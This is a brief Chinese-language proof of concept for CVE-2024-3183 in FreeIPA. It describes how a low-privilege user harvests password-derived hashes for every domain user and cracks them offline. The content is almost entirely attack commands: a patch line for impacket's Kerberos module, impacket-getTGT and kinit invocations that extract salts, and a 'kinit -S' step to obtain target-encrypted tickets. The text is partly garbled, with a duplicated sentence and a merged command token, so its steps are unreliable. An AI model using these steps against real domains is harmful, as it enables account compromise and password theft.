针对 CVE-2024-3183 的 POC(FreeIPA Rosting)
影响: 低权限用户可以获得所有域用户密码的哈希,并执行离线暴力破解(kerberoasting)。
修补 impacket-getTGT:
decoder.decode.defaultErrorState = stGetValueDecoderByTag 添加到 impacket/krb5/kerberosv5.py。decoder.decode.defaultErrorState = stGetValueDecoderByTag 添加到 impacket/krb5/kerberosv5.py。-service 选项和 -debug 选项的 impacket-getTGT,通过一条命令获取 salt。
impacket-getTGT test.local/user -debug -service adminkinit user

printf "%b" "0\n" | KRB5_TRACE=/dev/stdout kinit admin | grep salt

kvno admin


1 - TGS, 2 - SALT, 3 - 密码。
kinit -S target user这样你会获得一个由目标用户密钥加密的 TGT。